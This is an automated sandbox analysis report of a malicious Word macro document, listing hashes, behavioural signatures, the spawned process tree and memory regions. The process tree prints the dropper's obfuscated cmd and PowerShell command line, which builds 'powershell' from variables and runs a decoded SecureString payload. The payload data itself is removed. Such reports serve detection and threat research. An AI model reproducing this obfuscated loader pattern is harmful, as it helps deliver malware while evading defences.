Analysis

  • max time kernel
    121s
  • max time network
    122s
  • platform
    windows7_x64
  • resource
    win7-20240508-en
  • resource tags

    arch:x64, arch:x86, image:win7-20240508-en, locale:en-us, os:windows7-x64, system
  • submitted
    26-05-2024 04:52

General

  • Target

    6a122e231e0bf2a8ab5702f57b524c04JaffaCakes118.doc

  • Size

    143KB

  • MD5

    6a122e231e0bf2a8ab5702f57b524c04

  • SHA1

    375682485ba8d3e0f526a89ca74445da22fa6c8b

  • SHA256

    8338ec1efdc66d060728479ea9d786b9160713f51748f0886ce1fcdb5ed674e4

  • SHA512

    54533ac81f84a46295b3d16ce9af2b6caaddb005c1d530bafa20ee26514c37729b57bf79388d82c01840faecf052c8cd29e32f94b3f4659143c615fae1d034c0

  • SSDEEP

    3072:R5RjSvyEv5naD/tEGjyAoEMWMUmZN24G2iYwi:R5RjSvyEv5nahElkWUKkB2i

Score
10/10

Malware Config

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 3 IoCs
  • Drops file in Windows directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\6a122e231e0bf2a8ab5702f57b524c04JaffaCakes118.doc"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2040
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:2924
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" auZUDBl UbSMIQQCXcIrQbXws WsAFuOPwdTAn & %C^om^S^pEc% %C^om^S^pEc% /V /c set %hOUTErzjCPZFNvv%=LsuBiOkZwYFVMa&&set %FBrakmc%=p&&set %hBzBsfM%=ow&&set %IhTCbFOdJimEiPO%=GYaEQMUp&&set %sHwKWNd%=!%FBrakmc%!&&set %jSdvWflbWbGsmKU%=jhiPPijVKoSjv&&set %arzcphwUmMIsr%=er&&set %mhlYSdlspDIt%=!%hBzBsfM%!&&set %iQVEaThdhaOM%=s&&set %IJvMdWIcTGdsKhH%=WVvEkVid&&set %MmBoqOFutNNLYC%=he&&set %nXdkKuShfn%=ll&&!%sHwKWNd%!!%mhlYSdlspDIt%!!%arzcphwUmMIsr%!!%iQVEaThdhaOM%!!%MmBoqOFutNNLYC%!!%nXdkKuShfn%! ".((GV '*mdR*').nAme[3,11,2]-joiN'') ( ( new-obJECT managemENT.aUToMatiOn.psCRedEntial ' ',( '[base64 blob removed]' | CoNvERTTO-SecUreStrInG -K (132..101) ) ).gEtNetwoRkcrEDentIaL().pASSwORd)
        2⤵
        • Process spawned unexpected child process
        • Suspicious use of WriteProcessMemory
        PID:1992
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          powershell ".((GV '*mdR*').nAme[3,11,2]-joiN'') ( ( new-obJECT managemENT.aUToMatiOn.psCRedEntial ' ',( '[base64 blob removed]' | CoNvERTTO-SecUreStrInG -K (132..101) ) ).gEtNetwoRkcrEDentIaL().pASSwORd)
          3⤵
          • Blocklisted process makes network request
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2884

    Downloads

    • C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm

      Filesize

      20KB

      MD5

      9338709512ade5ae71fca39002097c1c

      SHA1

      67701e6818bab210e0cd40600717b80fe76ddfb0

      SHA256

      1fedb5d7a44ffd545b59f5f344fad1ca3068d724bb85fcda045dc5843e60749c

      SHA512

      45de8850a19429d0ee3cd225c935678519c44e45eb9b9cdb9e284886cdc490ff29f6d5db2b614faee8a3578fed70f32d04660a94c28dc2d86b03c6d3b39d63c3

    • memory/2040-27-0x0000000000630000-0x0000000000730000-memory.dmp

      Filesize

      1024KB

    • memory/2040-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/2040-7-0x0000000000630000-0x0000000000730000-memory.dmp

      Filesize

      1024KB

    • memory/2040-10-0x0000000000630000-0x0000000000730000-memory.dmp

      Filesize

      1024KB

    • memory/2040-11-0x0000000000630000-0x0000000000730000-memory.dmp

      Filesize

      1024KB

    • memory/2040-8-0x0000000000630000-0x0000000000730000-memory.dmp

      Filesize

      1024KB

    • memory/2040-34-0x0000000000630000-0x0000000000730000-memory.dmp

      Filesize

      1024KB

    • memory/2040-14-0x0000000000630000-0x0000000000730000-memory.dmp

      Filesize

      1024KB

    • memory/2040-15-0x0000000000630000-0x0000000000730000-memory.dmp

      Filesize

      1024KB

    • memory/2040-13-0x0000000000630000-0x0000000000730000-memory.dmp

      Filesize

      1024KB

    • memory/2040-16-0x0000000000630000-0x0000000000730000-memory.dmp

      Filesize

      1024KB

    • memory/2040-12-0x0000000000630000-0x0000000000730000-memory.dmp

      Filesize

      1024KB

    • memory/2040-22-0x0000000000630000-0x0000000000730000-memory.dmp

      Filesize

      1024KB

    • memory/2040-21-0x0000000000630000-0x0000000000730000-memory.dmp

      Filesize

      1024KB

    • memory/2040-64-0x0000000071A5D000-0x0000000071A68000-memory.dmp

      Filesize

      44KB

    • memory/2040-2-0x0000000071A5D000-0x0000000071A68000-memory.dmp

      Filesize

      44KB

    • memory/2040-6-0x0000000000630000-0x0000000000730000-memory.dmp

      Filesize

      1024KB

    • memory/2040-36-0x0000000000630000-0x0000000000730000-memory.dmp

      Filesize

      1024KB

    • memory/2040-37-0x0000000000630000-0x0000000000730000-memory.dmp

      Filesize

      1024KB

    • memory/2040-35-0x0000000000630000-0x0000000000730000-memory.dmp

      Filesize

      1024KB

    • memory/2040-30-0x0000000000630000-0x0000000000730000-memory.dmp

      Filesize

      1024KB

    • memory/2040-29-0x0000000000630000-0x0000000000730000-memory.dmp

      Filesize

      1024KB

    • memory/2040-24-0x0000000000630000-0x0000000000730000-memory.dmp

      Filesize

      1024KB

    • memory/2040-23-0x0000000000630000-0x0000000000730000-memory.dmp

      Filesize

      1024KB

    • memory/2040-28-0x0000000000630000-0x0000000000730000-memory.dmp

      Filesize

      1024KB

    • memory/2040-20-0x0000000000630000-0x0000000000730000-memory.dmp

      Filesize

      1024KB

    • memory/2040-63-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/2040-47-0x0000000071A5D000-0x0000000071A68000-memory.dmp

      Filesize

      44KB

    • memory/2040-48-0x0000000000630000-0x0000000000730000-memory.dmp

      Filesize

      1024KB

    • memory/2040-0-0x000000002F2F1000-0x000000002F2F2000-memory.dmp

      Filesize

      4KB

    • memory/2884-46-0x00000000061F0000-0x000000000622A000-memory.dmp

      Filesize

      232KB

    • memory/2884-45-0x0000000006160000-0x0000000006198000-memory.dmp

      Filesize

      224KB